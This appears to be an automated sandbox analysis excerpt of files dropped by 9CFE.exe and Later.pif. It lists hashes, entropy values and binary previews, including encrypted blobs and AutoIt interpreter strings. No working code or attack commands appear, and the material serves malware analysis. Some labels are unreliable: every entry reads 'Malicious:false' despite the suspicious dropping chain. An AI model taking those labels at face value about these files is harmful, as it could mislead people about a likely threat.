                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):78848
                                      Entropy (8bit):7.997565494161811
                                      Encrypted:true
                                      SSDEEP:1536:beu6/A3dwW6ekkGLpLmhzue+o26yAEYumZw5fvf0e26iRNuYSu:bx6IN5gqhSe+UyhYyf0e266MYF
                                      MD5:788BB559246270A813B5B08B0CA7FACD
                                      SHA1:60FFB0FE7FF2D196E77AD84210AECDDC667BD0E6
                                      SHA-256:78C7C598711B5DCA11D33DCB9FBC4330967780E76EADE6BDBE6FDDDD0E5B4383
                                      SHA-512:BBE2DB2A25360A393B8D9620025CB27FCBCBC5ED490AB8D80C7ADAB31F54A6FABD786089F40371DB4B3B7A12070120C6D175B20D7C275728FA5D2F0C02559A33
                                      Malicious:false
                                      Preview:.L.....=6.{....i..om..+[...X..P...........Z.G2...w.%.}V|..0n=E.?.F.'.y..e...@{..%_O.p.n;|{..........1..IB.|fp.d.....z.....uUDRc...[..j...g..b.R.`.2}8r..,M.h......c...x../....3.....#.(....n"t..j.Y1..{..Z}s.#......>.*.......i...G....v.E|.He3..;...W..I9.p.93...~O.......`.1@....d.u..NbJ.c.sJ.(S9...F........1X..j..J...\...#9.Yb?.......V..H.y0*R..!..n..<..X..(8r...g;....G.CB...T..M|.qh.`..e.as.@rc...^........$.N.`.N'..&kB.o.......x...d..>J...s8...W...!...7.eZ.......\.&......N..]..]1......;6Au%.....B.c.L3p.w................./(.l..B4.H.~.'P.\<.pI'..+..W%,......n....K.I.J`..=!.pKl.OVx..O.o.F.K.t......KW8D..5..o.:..VK}.....'.o.o`./%h.s... }z.v.k{....n..>'a.X?.."..aO+.%z.......T...loL"k.. ...A%....J..I.b2..yDO0..x..;|.X@..R..TZ.a~.......P.*...O...i:..8iH>j.$@..gE+...T|..M/..41>....x`R..; .....+1...Aw.,.J..$f.`E].......[...v..?&.0-....7:.KV..s....ex..o..'..J...eJ....8,...Y%....,e..6x,.)Z..a..!.>.(.*..F.#...+u.3.....T...g..Gxen..U*...........6..j*.fG
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):16384
                                      Entropy (8bit):4.421304726767445
                                      Encrypted:false
                                      SSDEEP:192:lZ3vRzfZyyyVNt20M4KdULSx6/JZ9FrKUS1IPuoqRWsHnhAb7K7zipamOEoh8uIo:7pzhQVNt2bSSk/ju9oiPqYaPuz
                                      MD5:C8B983ADBB460963126F5A21D08F6FBA
                                      SHA1:7D2B6CB16C6D3C7CDECD7FD330B1E03D3EFE17DF
                                      SHA-256:1567E6C24C7944C757E595C59F096868F14755900312B0C78EE14D7EB4EA0062
                                      SHA-512:C7164A8E0C3FF4A4FEED68918F9FC84593A1E1597F7A580D1FACE3C40345E5F19DA589419B7F7696BB05E37D2B6D200C21CC74A17C2326B75A668A671CB4FD6A
                                      Malicious:false
                                      Preview:.L...G...@.L.......D.L.......H.L.......L.L.......P.L....T.L.L.I...`.L...G...d.L.......h.L.......l.L.......p.L.......t.L....x.L.l.I.....L...G.....L.........L.........L.........L.........L......L...I.....L...G.....L.........L.........L.........L.........L......L...I.....L.B.G.....L.........L.........L.........L.........L......L...I.....L...@.....L.........L.........L.........L.........L......L...I.....L.,.G.....L.........L....... .L.......$.L.......(.L....,.L.$.I...8.L...G...<.L.......@.L.......D.L.......H.L.......L.L....P.L.D.I...\.L.,.G...`.L.......d.L.......h.L.......l.L.......p.L....t.L.h.I.....L.2.G.....L.........L.........L.........L.........L......L...I.....L...G.....L.........L.........L.........L.........L......L...I.....L...G.....L.........L.........L.........L.........L......L...I.....L.H.G.....L.........L.........L.........L.........L......L...I.....L...G.....L.........L.........L....... .L.......$.L....(.L...I...4.L...G...8.L.......<.L.......@.L.......D.L.......H.L....L.L...
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):8192
                                      Entropy (8bit):4.2143736203359765
                                      Encrypted:false
                                      SSDEEP:192:wGyYqbQWww9nikP/767EnkEHay0pjW6+fWBsjuo:fnqccokn7IEV0pQfsKuo
                                      MD5:3141771EB239CA6BB2A43705FD855FC0
                                      SHA1:5ACCBC2B445BD247D5A748BDACD1BE7A25AAF1E2
                                      SHA-256:C8E354A697A15B7BC64FE00AD47411603EC2CC10DC7CB334033744973040C9E5
                                      SHA-512:C058CC99A601CF42085BE47272CEB61CC5EB2E9510985473BA8C6F6BBA9819577EA08AADEE71150BC3A75409DA7B9BDC7BA9FDBC920FF8E5B855ABD31FAF7A62
                                      Malicious:false
                                      Preview:..L......L..2I.....L.jEH.....L.........L....... .L.......$.L.......(.L....,.L..1I...8.L.SFH...<.L.......@.L.......D.L.......H.L.......L.L....P.L.(0I...\.L..FH...`.L.......d.L.......h.L.......l.L.......p.L....t.L..2I.....L.XGH.....L.........L.........L.........L.........L......L...I.....L..GH.....L.........L.........L.........L.........L......L..5I.....L.".@.....L.........L.........L.........L.........L......L..5I.....L..3G.....L.........L.........L.........L.........L......L..4I.....L..F.....L.........L.........L....... .L.......$.L....(.L.03I...4.L.@.F...8.L.......<.L.......@.L.......D.L.......H.L....L.L..2I...X.L.z.F...\.L.......`.L.......d.L.......h.L.......l.L....p.L.l4I...|.L...F.....L.........L.........L.........L.........L......L..3I.....L...F.....L.........L.........L.........L.........L......L.L4I.....L...G.....L.........L.........L.........L.C.......L......L..0I.....L...G.....L.........L.........L.........L.B.......L......L.h/I.....L...G.....L.........L.........L.........L..
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):76800
                                      Entropy (8bit):7.997428505326654
                                      Encrypted:true
                                      SSDEEP:1536:baRZiTBERWndm17bTZGTe6Od/EJ/NxZ5Q8yv4ITH:G6aRCdmJbsC688DfyvBTH
                                      MD5:96958090B3358858DAF1400F4D26A89B
                                      SHA1:F0C3D4F0EFF1B8001E0E8D5B5BAFD7266CEE3669
                                      SHA-256:EC731EAA8FC2CF0121F7E5A31373A71B860FB3D292101349A78B7429EDD15DB8
                                      SHA-512:496282E36CA7D5D8B10CC13501F66167E4D3B03FEEDFE027C6C6A33F4DECC5EAAC931589EDA7A60C6BE3067EDE478D023FDE757C48CEF94BF354471309FE0102
                                      Malicious:false
                                      Preview:IGq....6Z-...........D.....K-..j~...R....}..z..$.}]...\...Q.L.6b.=.....Yt..7....G...o........MP..{..."..#.v....?.q..4.......A&..i.A....d...y..-9'#._....BH.37U.3...BY.V?_..W.......q..)6._..W.F.|...Mldf..}..).i..0.^7=.2.....k.......J...,..w..cB....`R.)<z.Z..az.H..A...~5....r....Z._.9.B.e.c../.v....}.0]/.aS.]....P.'...1.A....vCW...zX...........'eX.Y..Q.U...v.~.M.......O}..v....)K9.J,T@...7.V.....A....\B.i..`..Q0R/..-=]..!.S.MO...\K.#...)}{.k'.....mF~.zT...... f1...#xg*..Q-.5.....Q.......]zM.cL.w...rJ*H...z..9..^.... .G...D*^@SO.......@.vE..N..w.....=.P.....2..;........w+d...<.]...|.MEI...B0.rb.BFp..E.*......Bf'!...z;.j..dp......4..Es$bA5.M..{g.T.....bh.]........tZ .b........JMI.....4.....X...>...K.....,.E.cc.K.KW..tX`...2..D[x.R..6...r.+...i....9.` ...q.=.BK....3...#.y.._...F..y.+..N...Q.u......-j....T.....F*.d%..._w._S...p8.;.A?.........g..l:........`J....;..m;...^.h.$...M.'9Bt3M.......y...!\...a..;X..$.R......[...i..{&.9...].XsH.U....E9
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):9216
                                      Entropy (8bit):6.535883088376657
                                      Encrypted:false
                                      SSDEEP:192:pS6XgRZi3LdB1gPOf0WcKPVo1FNVvmQ2cPMqAnWu5ckScqrc8:pNXxdB1gv4PSTNVvmQXPMYSckSlf
                                      MD5:FD15A680275B95D80A71074ADD0EC220
                                      SHA1:62858FF7C24CB825DCF681BAEA3AD17F40DEA330
                                      SHA-256:DDF4D0F67C60CAB0E294FBED7F1CDE5AD07C9FA9D9695A97E5F1034E1A2BA083
                                      SHA-512:3B33803EFDF683B2596D4401F062D86F93878BC6B76EE10615145739845C384F0F229983BFDD318C3B90A0181688BDE576CD6B943CC2CE837B2DCB75C216E6C6
                                      Malicious:false
                                      Preview:...T...D$0.L$.P.F...............D$ ..D$..T$..L$......F..T$..T...M .D$.;.~....D$..C.9...j....}...}.tl.E..0.E .0.7.m....\$....E..7..;T$.}!..j ..._.C..4..C..t..B..;T$.|.}..L$..C.....t...t$..........j.X..3.@...#.t$..E..0.E .0V......M....3.D$....L$0.1....L$@.(....L$P....._^..[..]...U..U.SVW.z....u?.}..'..;.~@...C.....t.....f....M.V.A..0....YY..t......U.;.|......2....}.....;.}...x..C........C....E.......3._^[]...V..W3..N...t.Q......~..F...t...u..v..;....v..3...YY.~..~..>.~._^.U..Q.u.j..u..u..u......Y]...U.....e...E.SVWP.E..P.u..........u..}..7.G..M........|...\...U..T...M..E....t........E.;.|.j._.u.........&....F............!t..u..u.QPWVS.u...........E....th...uc+}...tR...tW.M...#...M..9$....;.~...SQ..#..YPV.B......SQ.M...#..YPS.M..v...P.$.......Q......t.WVW....@t&..t..M..#.....>.u.........F.............tN...t............t..M.............t..M..........u....].......E....F..........J......JtsJJt8...........t..M........V..>.^..u....}....F......^.......t..M..w......>.u....T....>..
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):46080
                                      Entropy (8bit):5.046712164047226
                                      Encrypted:false
                                      SSDEEP:384:R7VkxhPfpluui01zrevzAHJcXj7c88888888888888888888888888888888888l:R7VkrHpluuxdCvEHKKgItUHiC
                                      MD5:D3FAAB109A7022713033E68BC5BEDC44
                                      SHA1:8B79B20D52ADE296BF73EE1852B1A0D1B363C153
                                      SHA-256:1DE60AB65F02EF9094718DCCC3DB5A573EF6A9D9C442C72C92CBAC9561A0852C
                                      SHA-512:F3F6A610ACE7340E0ED74FD4AA45656809F53E04A0D9A02213D8C8FBCCC45E905A50B95B03ED9C652F64375F03B87FADC387BDDE12CA596ADD4DCA533040B83E
                                      Malicious:false
                                      Preview:...L.L.?..n.H.N>.....`.@...H.S.?.W....$>.......@...8.Z.?...q.;>.......@.....a.?N../.[7>.......@...(.h.?..=..mC>.......@...0oo.?.H.75.M>.......@...H.v.?P.....#>..... .@....|.?.G....7>.....@.@....*..?.#4..2I>.....`.@.......?o....oJ>.......@.......?...-..#>.......@.......?.h..%.F>.......@....@..?.R.x^.D>.......@...PP..?....s.@>.......@...4L..?P._!..#>..... .@....4..?..:#.G>.....@.@...L...?qg.:&.J>.....`.@...H..?5L$...4>.......@...\w..?.!.1..C>.......@.......?....[<>.......@...D...?..<....=.......@.......?...~...=.......@....y..?......B>..... .@.......?.~....4>.....@.@...h...?..u.|.8>.....`.@....E..?A.8yL.;>.......@....h..?..41..C>.......@....{..?-...+oF>.......@...$...?x.....O>.......@....s..?..m.T2>.......@....W..?.....=.>..... .@....-..?..\..=>.....@.@.......?....\=.=.....`.@......?..j\&".>.......@....X..?...1.D>>.......@.......?.#O#`.I>.......@......?.}....0>.......@.......?...F\IE>.......@...t{#.?....,B>..... .@...0.'.?.E. ].$>.....@.@...,>,.?...?.5>.....`.@.....0.?..iIq.E>
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):13312
                                      Entropy (8bit):6.444059541467524
                                      Encrypted:false
                                      SSDEEP:192:nwV+h9s3Qz5LiMwT1zVisLaxsmkCFbzKhg1F9VgGbVUhsVoLlh11ZsUc55QxxrVs:nBjwTZwNKm7AI4xhLk5QdSJBl
                                      MD5:FBC0EFBDD27231BE2221FD3D28AFF7F7
                                      SHA1:F4679F4BF520AA08C33073BA9CBCB849BDF7FB83
                                      SHA-256:AE7CE67ABCBEB34933047A7435AA59B9E06320FB2DB8F3D443AE8454F34F7367
                                      SHA-512:357E182B7629C272A2B250E6CABA745723AB96596E2D7480B189EF6F7D56C5F170ACA37BCE9EEFD7B4A7789708D15DFCB600DB23290AEF0F5D25A6F7A9519E64
                                      Malicious:false
                                      Preview:.~.2..'V.u.W.3V.r......3.f..~^9E.t.G..?......._[]...VW..4.I.....h.I.....tmS..gL.V....y.....tY...hL...W....0.x......t?..$hL.....9.t1.V..$hL.............u.......P......Ph.....1....I.[_^.U..}..t..u...gL..x......hL......hL....u.3.....hL.......0..<.I.3.@]...U....hL.W.}...t.W..gL..<x......u.2.......hL.V....0..u...\.I.9.t.2.....j.V..gL..3u....t....E.j.h..H.....x....E.....|....E..........E..%LhL....PhL.........l....ThL...p....XhL..6..x.I..}..LhL......t.;.t.P..gL..Jw.......u..'...^_]...U..}..t..u...gL..Yw......hL......hL....u.3..-..hL.Wj.......8W..\.I..M.j.W....\.I..M._..3.@]...U.....|hL.VW.}..E...t=..99t..E.P.M..y....E...M..y..u..E..|hL.P.(....DQ......wi...7.u..~..u.3..-.M...^..V.M.}..Ti...E.|hL.P.R....M..Xi..3.@_^..]...U..}..t..u...gL..cv......hL......hL....tW..hL.V....0.~..t.9..gL.u....gL...v...H.I..f...}..t#.u..u...L.I..F...4.I.9.u...hL...gL.^]...U..}..t..u...gL...u......hL......hL....u.3..-..hL.......E..AX.E..A\.E...~..A`.E...~..Ad3.@]...U..}..t..u...gL..}u......hL....
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):63488
                                      Entropy (8bit):6.5578611648939145
                                      Encrypted:false
                                      SSDEEP:1536:BFsoejQ1/9klkp5VLGEDuaiC7v8xV96AE11yHxpfYAzO:BqoT1/Qkp5IKuLuv8xVTOAxpg6O
                                      MD5:1CEEDBD8FCD17CC6354FDD5E1F3A4805
                                      SHA1:B4407DEDF99A02EF1BE762240885F73C76364217
                                      SHA-256:044865AD2A527AB181100FECF465F37DDD792AE9C6990B55F5BA5A81CB3A9A5E
                                      SHA-512:4311CDAE70EF01DBA34CC1B358471A4B476749AD3196922DF7347B6A823EA23DB49F7281645982EC088FD3640DE60834943B51CBFC3335B675F3105D3DCBF9C9
                                      Malicious:false
                                      Preview:$.u...P.Q.SSSh.....P...j.Y.D$H.D$@f.L$@.M.P.......SSSh.....(....L$.SSSP....V....L$P.....D$@P..\.I._^..[..]...U......SW..M.h..I.....}..W....N.....u...j.j..H.............V3.F.u.9w.v..J........E...................G....x..u..8..3..x.....u.....3.f.8.....E...........e...M.e.........tG...M.0........E.u..t.C..M.QVj...h......`...P.u.....I..M...`...P.......j.j..H.........}....K....u.....I..=......u|.... ......M.Qh....j.W.P..........M............U.RQ.P..u..}.E..u..P......QLj(..l...P.E.P..H.I..M...l...P......E...P.Q......e...M...QhL<I.W....x..u..M.QV...P.....V.Q..u....}..tv...M.Qh....j.W.P.....x_.M...tX.....u.3.RRR.U.R.....u(3.U.SSRSj.Q.P0.u..M..y....u.....I..]....U.R.U.RQ.PH..t$.E.P...Q...j.j..H........^_3.[..]....E......uR.U.RP.Q..M..E.P.q...A.P..A.PQ..H.I..M....u.Q...R0.........u..M......u.....I.......U.R.u.P.Q..}.........E.P...Q..e..3..E..........u.........E..U.!u.RW..P.Q..}.........E..U.RWP...Q..E.U.RP...Q..U.R..B0.E.E.P...QL.M..3.U.9U.vU.E.U.R.U.R..P.Q ..u4.E..U.R.u..
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):44032
                                      Entropy (8bit):7.995708398104775
                                      Encrypted:true
                                      SSDEEP:768:/+QbdXMNxrun3yHbkvJEA36VY52eoZ4mPBDk4OwZ7BHopCKN8BJ3IyyQPiARVZxL:/+QXoxa3PJEAYY5vo6mJDkzwhBmhkBPl
                                      MD5:BDC05936BC92D656B9C0CBE428F29C90
                                      SHA1:6293D7153F2F2C7C444E38F775A6B983FC57B172
                                      SHA-256:B4D4DED870837679BEABCDB2733B8FB83C8DB04EAD81245B688031C079FB0823
                                      SHA-512:9A7415651DF01D575A4A29824F69C310289ECC0774E8FEB9C2BCE9597F91991FAAD41A84D0DA90EC154486A7D90EA8F4B60EDA35AB92982024479E316273B936
                                      Malicious:false
                                      Preview:T}.rU....2T...}..........G&...`.....wy5....Z......~>.a&..[.,".7..%.3..C.W.a.....A.co.)%............{[V.N......dX..kV..r..Y.M.........D....z.....5....G...`..h..W-..........9.M_...?..c.......~.O)....Eg.6.M..D.%.hx..e.go!"@...xy5....#C....p.>..wF&...Y.).."{.l*..fF..K^E&.....>...^.>B.0..(..(..T..7..s..M..".V....6.p....H.;....sO......mk....A8]...;].ek.S...N&..<..[...2.U..4]..^.b..DMR.9A8+...P.k..$.... Y;..\T-...3P[.j.-C..>w.j...Kb`....D.L..g$..i.../....5X.n...]."..c...!O.....3.*........;U....c...Xv.qc410.^.]..=..+..C......L.7P.*k.V.o...e..p.Z.e..:<.f.yE.<....$..zt.bO...2.G7J............@...(......>...?9m....T0._.......:...K..!}G....)kR.i......gr.+...P.S.K...8...2*>.@.Q.].By_S&.c...dY....IN.b.....&./a.x..m.=P.R.0h..7e..H.......).c.j..f`|...H.....m{31.w.o......b..>....".pTI.....e.7..f.....4b[......~. .=...ZK,v....4..I...O.,.......[I.mx..(G...S...P.NJ.J......2.8. j0:...C.5....L.W...... r......H.X,k.D.$..@f<..X...l..-.S..55...!./.K.......D.
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):115712
                                      Entropy (8bit):7.9983646851583945
                                      Encrypted:true
                                      SSDEEP:3072:pElkLuvWdB7ldNXujKvq1RA0gWW22zB1PEZhjj4vOTYQS9:pjKud1lbXujKvgb8B1S4FQ4
                                      MD5:747B4F0FD72C9AE3E5AEAFF2F95F6722
                                      SHA1:9D92B18421565A1AE1907FDDEB8C9A16D214879B
                                      SHA-256:F42BD539FCB9811F4F65CB82174A2352B39F9FEFF7D94A3BBF3D24DE25065B12
                                      SHA-512:F315D7C6B20E695236E7FF44F063649A1EC337FB08B55FEE6CF4CBDF5BA51F646F8B7A3356AC0DC9102D11CE4CC77821C936B0C840ED681F08DAEBBE460C7BE7
                                      Malicious:false
                                      Preview:..+..8\\....b....;.Rb.H....|S4..|....Q,..[........g....V..07.J0.LD..-.e.....'.p.....kp.*..X......o...(...xi...B.H..1JSd...W3.....w.M..Q...8.<..q.t7.w...hFV....Tp..D..Y.|...s....d."..'...K..)t2.....` wt.....PKk.$^....l6?O..Pwd....U.!o..7. ..H.p.+~r.0...J@x.>..*q8\...H..*..K:....s.3....2../#...e...~..Y..W..F.s.........!.EB...D.f..vE9[.Z...3+![.n.b?a.e..R+....i.?r.r..r.......0o#.....]./'.r..%O.....Z............Ui1...O.p6..b.I.Z......$.B..0T...?.fC...#...I...%...-....0.<..yw..b..F...0.W.{.....vE..].....;...!..E..cS.I.&.z...".....T...*8..OU[.N...k=?.)...W..\.L8....[Ui5c..:.x.6...-._..^8.j...].(\.....KN.NW..I.z...6.6w....<...?<.B....^.BZ..:;!7.'E1..>.}..!k.....;G..g....^..m s..C.....u..<.......~_...G"*..uA*.n..n![.{A...Em.?Q.r..[W..2`..T...g......Q.lB...Y.b.?ZT.B!.f.9a+...'...fy.2v...l........ct..V.J$'.Yae.bT\L{.S.z..{t.8/yv./..n(.`p.U.T....E..f$.c..nmP.PXh._..+c..h`..q.vz....vE<.t.*..bh.B`....Wo.j.>.@.d...c.T.0.......n..K.L.......p=.$..@"...
                                      Process:C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1026
                                      Entropy (8bit):4.697648179966054
                                      Encrypted:false
                                      SSDEEP:24:7/Q+t6r35NjtdGQB2dOAzD/GKwLon05avvk5byZGOQz2DfwAo+O:7oW6Xjt062d6LonB05+Vjf/o+O
                                      MD5:2B743B2063E25195104B0EB24000FB09
                                      SHA1:4BBE8DC0F1389A8C2082A1A102960A6DFA417E3D
                                      SHA-256:6BADB679FA8F658AD5B4BCFA108CE3CB4B16267EC34D0FDA395E0FDE077D6A35
                                      SHA-512:BFEA76E052B182E0FF523B5CFECBEDF46C5ED526779A92A23CFD0E0395DCD144EDA9950D01BEA17543625355701A248DB7C0873AC0998C7E30FE67ACD88BEE4D
                                      Malicious:false
                                      Preview:FACWLRWHGGUTKNRRDSQUQMZCBEYWHIGWQWDXAGWJENXOZWOWCCXESYMPIJTGQXPROJMVQPSXGHSYMONETHUFZZZWYBNNWDANRHNFGNMAPXCFFQQDTCIMRCOHAFIBMTZBZPXSMFDYHLCTPITIFTXZUDBYTJZHJKELKYLZQHQZYMSBYEFXYIVGTQEWIVDJIQTEZWNDCOSWOXEYAPNQABIDGYTDJVUKMXYENQOXDATDTJVPVZZMHBTMCEKAZAPACJJWDWTDMDDUOUKVMXWLWQJIUBISHPDQERGKUJVZNEQXZLZLPAAWAIISWMNZUCNHVPXDFUMDEQXILTXQAJMAARGKYBBBICJHNOFJVCGSQMBWXMQELPZMSXWNWZOHIKTQHSNOOEOBJZYHKSWSISVNUCPTNDKLJPXFFKNAZWAKYWAQWKPWLPQBKZJOKHWXUBBXWKQFWXTNIZFYWIGTLBHZHKFRJPDBJYRQPQBTZUQVURGNTQJTFZCFBTOGNCSXOZYULXOKVYONRQOTNOMUPVCDBYIRPNYZSLKSNBOWQKKNJMJHNRUWBXYJGSZSPXSONGCMHTNOICXWNYGZZSXUAIERVNFFQNXDQVRWFMTTMSSSOBHILBUKCDGSMNJBQTRQLBDQKVRGXKWZVMFALQRGBPLMGEORKLBYALNGJAXLKGBFGJJGJRUDKBMQEFJXXWMAJRDTIEDANEPUIJCTTDZYEQDJPJIWYDQDRTRUDDZSJLFZYIHKHRWEGVLQCYQAPXOIJCBELZDZEOFPKSIJQMAQMSMXBREQEEHWXGMHEUPNGVSDZAPNVXQJCPLULFQIXRMSFCUNHHUFFJVFNQWNUUXSOMSNJWOYNUHTHGAZSWYOKIKISIGFZEGFZHQIREUWAJLPABARUVHOGZWCJTJIKKPAQXNJIPQCFVNQOWRXDIFVHURRRNGLTJZAUJLDZUVLHLMXGCRXOISIAINZBFTCEVMHTOSDRBUXYFVYIYXOYHKTGTSHIRYW
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):33792
                                      Entropy (8bit):3.91636531375553
                                      Encrypted:false
                                      SSDEEP:384:fl1qIvtx4MjNyREfP91uphFTqU7x5MOUyM0pNDj21naB3pMygarucTQ0Snh3H:nq25NKEHq9BxyyM0Dj2Bmgari0U
                                      MD5:489C0B483DE5C3682D204AA4C5A56318
                                      SHA1:5CA0A30EDD845781E4DC960CC63F7D090886DFCA
                                      SHA-256:9135DAD7AB092E2CE567B9F434D16D4DFFB9A3AC63150C87481D486E7A28FC05
                                      SHA-512:9EF8B37FAB8A406155729079171CDEBFC7503CB933274D041BC6932940F0B77793F50C1C934F6E8B8E57CE37E4D6FAB94E509B96306A5331ACE45F88E518C28F
                                      Malicious:false
                                      Preview:c.r.i.p.t. .f.i.l.e.s. .(.*...a.u.3.,. .*...a.3.x.)...*...a.u.3.;.*...a.3.x...A.l.l. .f.i.l.e.s. .(.*...*.)...*...*.....a.u.3...#.i.n.c.l.u.d.e. .d.e.p.t.h. .e.x.c.e.e.d.e.d... . .M.a.k.e. .s.u.r.e. .t.h.e.r.e. .a.r.e. .n.o. .r.e.c.u.r.s.i.v.e. .i.n.c.l.u.d.e.s...E.r.r.o.r. .o.p.e.n.i.n.g. .t.h.e. .f.i.l.e.....>.>.>.A.U.T.O.I.T. .S.C.R.I.P.T.<.<.<...B.a.d. .d.i.r.e.c.t.i.v.e. .s.y.n.t.a.x. .e.r.r.o.r.....U.n.t.e.r.m.i.n.a.t.e.d. .s.t.r.i.n.g...C.a.n.n.o.t. .p.a.r.s.e. .#.i.n.c.l.u.d.e...U.n.t.e.r.m.i.n.a.t.e.d. .g.r.o.u.p. .o.f. .c.o.m.m.e.n.t.s.....O.N.....O.F.F...0.%.d...%.d.....S.h.e.l.l._.T.r.a.y.W.n.d...R.E.M.O.V.E.....K.E.Y.S.....E.X.I.S.T.S.....A.P.P.E.N.D.....b.l.a.n.k...i.n.f.o.....q.u.e.s.t.i.o.n.....s.t.o.p.....w.a.r.n.i.n.g.....L.i.n.e. .%.d.:. .....B.U.T.T.O.N.....#.3.2.7.7.0.....\.\.?.\.....\.\.?.\.U.N.C.\.....\.\...\.....S.t.r.i.n.g.F.i.l.e.I.n.f.o.\...\.V.a.r.F.i.l.e.I.n.f.o.\.T.r.a.n.s.l.a.t.i.o.n.....0.4.0.9.0.0.0.0.....D.e.f.a.u.l.t.L.a.n.g.C.o.d.e.p.a.g.e...%.u...%.
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):69632
                                      Entropy (8bit):6.541459614511599
                                      Encrypted:false
                                      SSDEEP:1536:mzWaIxOv/pAfkF/bIQ2dU7SP/jnsF4rJsx9RZqegm5kEMDzMdMhrNCsGJh5yAw:+WaIU/pA8F/bx2donqqnRqgmM0lAw
                                      MD5:783612211D75C3EA79092E5B2419267E
                                      SHA1:DF4A7ED25402ED9C7BCA0FBCD3CF5813FA91118B
                                      SHA-256:C67E6F51DF6B13C2F15C7F25E8A65B7BE6B5483B1F8455C84185DED7C0A5CE31
                                      SHA-512:263AB3994122D3A4F9306D64BA8E9874D8B189C15C43AB097C88AABDD7E3409A80C2D82C7D6ED895B7AEC98223B1F264DC8BAB40170030B40E69F4EF08D7EDCA
                                      Malicious:false
                                      Preview:.T$$.T$..n....L$..\....T$$.T$..X..........k..P..\.I..7.w.......k..Q.......k.........k..Q..P...k.....p.........7.<.......k..Q.p....k.........k..Q.p....~k...7....tk.....+..V.P......._k....G.C.[c@.[c@...C.[c@.<.C.\.C.x.C...C...C...C.,.C..c@..c@...C..c@...C.A.C.R.C.|.C.|.C.g.C.D.C.Ra@.Ra@...C.Ra@./.C.Y.C.u.C...C...C...C...C..a@..a@...C..a@...C./.C.B.C.h.C.h.C.U.C.N.C..X@..X@.*.C..X@.?.C.c.C.t.C...C...C...C.A.C..d@..d@...C..d@...C.Z.C.~.C...C...C...C. .C..X@..X@...C..X@...C.5.C.F.C.p.C.p.C.[.C...C..U@..U@...C..U@...C...C. .C.J.C.J.C.5.C...C..b@..b@...C..b@...C...C...C.9.C.9.C. .C...t..M..4...P...V_...Xz......Z...#..C......Bz.........M.....V.u...H.I......z..V............E...P.....3.@.ez..h..I.........$....z...G.P.p..,....E.....w..G....z...G....t....t....U...]......C].....V..]}......u...........9W.a....M.........1.q.V......M.......PQ.a......P.E.......P.....E.......p......E.......p..u....8..|..........E.u...\.....\...M.....|...E..F........~..|........W....V..F......|..H...wa.$
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):69632
                                      Entropy (8bit):6.771804495546552
                                      Encrypted:false
                                      SSDEEP:1536:z27MlRHq6EQU7uLQT6unj5ctpYuYtWGJG2kQyyy9Fsd:y7MlRKecTF5c2p02kQi9Fsd
                                      MD5:0452D038C67D5E1950354992477A9D9C
                                      SHA1:DD27EA03DA1EFEC8B9E7D70A6C40A9BA70A36C30
                                      SHA-256:3E2B2474924EBDF0D5230C3AFC8AF2ECC2BA547B157D1BAD630B3E342D51CAB0
                                      SHA-512:86AE0CDF66D5F7D1B91D7B4AA2C29C53D09D32CB1169DD100BA7C6CC6BC0F02A4B945B6E97CA2B5CDFB182DFEDDBAC9D4E62A61F01E919D41D457844B048D96A
                                      Malicious:false
                                      Preview:.+......^;E.s3..9......f;.....u...D....f.3......f.;............r........<.....$...+.j... ...PS......P..(.......IL..4.....I...@.....4............. .....@...9. ...........<.......0...+.;E.............]...8.............................H.....8...+......;.s;..7........8...f;.....u.j._f.8.....8......f.0............r.3.......VVhU...Q..H...+..+...P..PVh........I...@.....4.....<...........3..@...j.+... ...RP..........$...P..(.......IL..4.....I...t...@..... .....<.....@...;.......<.I...@.......<.....4...;.........8.....0...+.@...;........w...j... ...R.u...0....4.....I.....=..... ...3..G...W...Y.<..0.....(.....$.......IL..D..@t..:.u.3....v..........7.... ......+..[.M._3.^. .....].U.......P.K.3.E..E.......SV.......E.W.u..}.......3...........................................................(L...........................@.@ucP.bd..Y....t....t................IL......K..B$..........t....t................IL......K..A$...T.............F.....3.............................................
                                      Process:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):8192
                                      Entropy (8bit):6.02915662573454
                                      Encrypted:false
                                      SSDEEP:192:uPfnosDwG7Vyb46gGChFGUS99p2FbyzCiB75zq7QpK:uHn7DPhJhFTqUF2zCTWK
                                      MD5:8FE28829B698AF40111830EA56AC1676
                                      SHA1:0B94257520D86095743D949B17E28D0E2871A126
                                      SHA-256:ECC7E743A45811AC8DF10CAF8715FCA1B47C628E1E4522916CF6F5871073A256
                                      SHA-512:72565549AADCA5EAA60F3295C3B6A19B18FAD9B9C4EDBE35FCA4D4BF1F991B3455BA7A555BC225B3447AC31E458283EF909E2360795DAFAB6828819E75B4E694
                                      Malicious:false
